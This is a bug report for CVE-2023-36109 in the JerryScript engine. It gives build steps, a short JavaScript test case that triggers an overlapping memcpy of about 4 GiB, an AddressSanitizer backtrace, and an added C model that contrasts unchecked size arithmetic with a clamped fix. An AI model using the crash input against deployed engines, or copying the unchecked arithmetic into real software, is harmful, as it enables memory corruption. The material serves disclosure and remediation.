CVE-2023-36109: ==1327323==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x55fb3005c209,0x55fc3005c205) and [0x55fc3005c0f8, 0x55fd3005c0f4) overlap · Issue #5080 · jerryscript-project/jerryscript
Buffer overflow vulnerability in JerryScript version 3.0 allows remote attackers to execute arbitrary code via the ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.
JerryScript revision
Version: v3.0.0
Build platform
Linux cqian-s2 5.4.0-148-generic #165-Ubuntu SMP Tue Apr 18 08:53:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
let evil = new RegExp();
evil.exec = () => ({ 0: "1234567", length: 1, index: 0 });
"abc".replace(evil, "$'");
Execution platform
Unnecessary if the same as the build platform.
Execution steps
List the steps that trigger the bug.
E.g., if a bug is snapshot-specific:
build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js
build/bin/jerry --exec-snapshot testcase.js.snapshot
Output
SEGMENT
Backtrace
==1327323==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x55fb3005c209,0x55fc3005c205) and [0x55fc3005c0f8, 0x55fd3005c0f4) overlap
#0 0x7fc34e7684ed in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:823
#1 0x55fc2ff5cea1 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x55fc2ff5cea1 in ecma_stringbuilder_append_raw /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:2609
#3 0x55fc2ffe19b0 in ecma_builtin_replace_substitute /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers.c:982
#4 0x55fc2ffe9c25 in ecma_regexp_replace_helper /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:2924
#5 0x55fc2ffe9c25 in ecma_builtin_regexp_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:602
#6 0x55fc2ff7dedc in ecma_builtin_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#7 0x55fc2ff7dedc in ecma_builtin_dispatch_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#8 0x55fc2ff7dedc in ecma_op_function_call_native_built_in /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#9 0x55fc2ff84908 in ecma_op_function_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#10 0x55fc2ffec6dc in ecma_op_function_validated_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#11 0x55fc2ffec6dc in ecma_builtin_string_prototype_object_replace_helper /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:555
#12 0x55fc2ffeda96 in ecma_builtin_string_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1416
#13 0x55fc2ffeda96 in ecma_builtin_string_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1369
#14 0x55fc2ff7dedc in ecma_builtin_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#15 0x55fc2ff7dedc in ecma_builtin_dispatch_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#16 0x55fc2ff7dedc in ecma_op_function_call_native_built_in /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#17 0x55fc2ff84908 in ecma_op_function_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#18 0x55fc2ffcf524 in ecma_op_function_validated_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#19 0x55fc2ffcf524 in opfunc_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:758
#20 0x55fc2ffcf524 in vm_execute /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:5217
#21 0x55fc2ffbca95 in vm_run /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:5312
#22 0x55fc2ff5f2a7 in vm_run_global /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:286
#23 0x55fc2ff5f2a7 in jerry_run /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/api/jerryscript.c:548
#24 0x55fc2ff51a41 in jerryx_source_exec_script /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-ext/util/sources.c:68
#25 0x55fc2ff51a41 in main /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-main/main-desktop.c:156
#26 0x7fc34e411082 in __libc_start_main ../csu/libc-start.c:308
#27 0x55fc2ff52abd in _start (/home2/dingjie/jsfuzz/fuzz_target/jerryscript/asan/bin/jerry+0x1eabd)
Credit: Lime
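Why the reported copy is so large: both ASan ranges are 0xFFFFFFFC bytes long (0x55fc3005c205 - 0x55fb3005c209 and 0x55fd3005c0f4 - 0x55fc3005c0f8), which is (uint32_t)(3 - 7): the length of "abc" minus the tail position 0 + 7 that a "$'" substitution computes from the script-supplied exec() result (index 0, match "1234567"). The C below is an added example written for this page, not JerryScript's code; the function names, the uint32_t model of the size arithmetic and the clamping strategy are assumptions. The clamp follows the ECMAScript GetSubstitution rule that "$'" yields the empty string once tailPos >= stringLength, which is also why a spec-conforming engine returns "" for the test case above.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed model of the "$'" (text after the match) substitution used by
 * String.prototype.replace. Not JerryScript code. s_len is the subject
 * string length ("abc" -> 3); pos and match_len come from the exec() result,
 * which in the test case is script-controlled, so they need not fit inside s.
 */

typedef struct
{
  uint32_t start; /* offset of the tail within the subject string */
  uint32_t len;   /* number of bytes to copy */
} tail_span_t;

/* Unchecked arithmetic: trusts that pos + match_len lies inside the subject. */
static tail_span_t
tail_span_unchecked (uint32_t s_len, uint32_t pos, uint32_t match_len)
{
  tail_span_t t;
  t.start = pos + match_len;
  t.len = s_len - t.start; /* wraps to 0xFFFFFFFC for (3, 0, 7) */
  return t;
}

/* Hardened: GetSubstitution defines "$'" as empty when tailPos >= stringLength,
 * so clamp instead of subtracting blindly. */
static tail_span_t
tail_span_checked (uint32_t s_len, uint32_t pos, uint32_t match_len)
{
  tail_span_t t = { s_len, 0 };
  if (pos > s_len)
  {
    pos = s_len; /* the spec also clamps position to [0, lengthS] */
  }
  uint64_t tail_pos = (uint64_t) pos + match_len; /* no 32-bit wrap */
  if (tail_pos < s_len)
  {
    t.start = (uint32_t) tail_pos;
    t.len = s_len - t.start;
  }
  return t;
}

/* Builds the "$'" replacement text for subject s into a static buffer using
 * the checked span, so the memcpy length can never exceed strlen (s). */
static const char *
tail_substitution (const char *s, uint32_t pos, uint32_t match_len)
{
  static char out[64];
  uint32_t s_len = (uint32_t) strlen (s);
  tail_span_t t = tail_span_checked (s_len, pos, match_len);
  if (t.len >= sizeof (out))
  {
    return NULL; /* subject too long for this demo buffer */
  }
  memcpy (out, s + t.start, t.len);
  out[t.len] = '\0';
  return out;
}

int
main (void)
{
  /* Inputs taken from the test case: "abc", index 0, match length 7. */
  tail_span_t bad = tail_span_unchecked (3, 0, 7);
  tail_span_t good = tail_span_checked (3, 0, 7);
  printf ("unchecked: start=%" PRIu32 " len=0x%08" PRIx32 " (memcpy of ~4 GiB)\n", bad.start, bad.len);
  printf ("checked:   start=%" PRIu32 " len=%" PRIu32 " -> \"%s\"\n", good.start, good.len,
          tail_substitution ("abc", 0, 7));
  printf ("in-range:  \"%s\"\n", tail_substitution ("abcdef", 1, 2));
  return 0;
}
```

The checked variant widens the addition to 64 bits before comparing, so a large match_len cannot wrap tail_pos back into range either; the comparison against s_len, not the subtraction, is what decides whether any bytes are copied.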